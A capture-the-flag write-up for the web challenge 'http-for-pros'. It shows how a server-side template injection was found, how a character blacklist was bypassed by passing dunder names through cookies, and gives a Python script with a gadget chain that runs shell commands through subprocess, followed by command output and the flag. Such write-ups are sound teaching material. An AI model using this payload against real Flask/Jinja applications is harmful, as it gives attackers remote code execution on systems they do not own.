Tags: web template-injection python
Rating: 4.0
# http-for-pros (web, 200p, 43 solved)
## Description
```
You have all the hints you need... Get the flag!
Flag format: CTF{sha256}
```
In the task we get a webpage with some search form.
## Task analysis
It seems the form either echos our input, or in some cases sends back some WAF-like error that certain character was blacklisted.
It took us a while to notice that there is a template injection issue.
If we send `{{3*3}}` we get back `9`.
## Template injection
Now also the whole blacklist makes sense!
We need to bypass the blacklist and get RCE.
One of more problematic blocks is `_` and also `__class__`.
But there are some tricks we can use, for example we can use `request.args` to access GET parameters, and we can use `[]` instead of `.` so for example `request[request.args.x]` would do `request.__class__` of GET parameter `x=__class__`.
It so happens that GET parameters were also subjected to blacklist.
But cookies were not!
So following the same idea, we can do `request[request.cookies['a']]`, set cookie `a=__class__` and we confirm it works.
### Gadget chain
Now we just need some decent gadget chain from `request`.
First one we found was `request._get_file_stream.im_func.func_globals['__builtins__']['__import__']`, so we can craft it:
```python
while True:
cmd = raw_input("sh> ")
params = {
"content": "{{request[request.cookies['a']][request.cookies['b']][request.cookies['c']][request.cookies['d']][request.cookies['e']][request.cookies['f']]('subprocess')[request.cookies['g']](request.cookies['h'],shell=True)}}"
}
cookies = {
"a": "__class__",
"b": "_get_file_stream",
"c": "im_func",
"d": "func_globals",
"e": "__builtins__",
"f": "__import__",
"g": "check_output",
"h": cmd
}
r = get("http://35.198.103.37:31612/", params=params, cookies=cookies)
print(r.text)
```
And we get a nice shell.
From this we can just do `ls -la` and then `cat flag` to get:
```
sh> ls -la
total 32
drwxr-xr-x 1 root root 4096 Dec 1 08:56 .
drwxr-xr-x 1 root root 4096 Dec 1 08:56 ..
-rw-r--r-- 1 dctf dctf 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 dctf dctf 3771 Aug 31 2015 .bashrc
-rw-r--r-- 1 dctf dctf 655 Jul 12 2019 .profile
-rwxr-xr-x 1 root root 2699 Dec 1 08:55 app.py
-rwxr-xr-x 1 root root 69 Dec 1 08:55 flag
drwxr-xr-x 1 root root 4096 Dec 1 08:55 templates
sh> cat flag
CTF{75df3454a132fcdd37d94882e343c6a23e961ed70f8dd88195345aa874c63e63}
```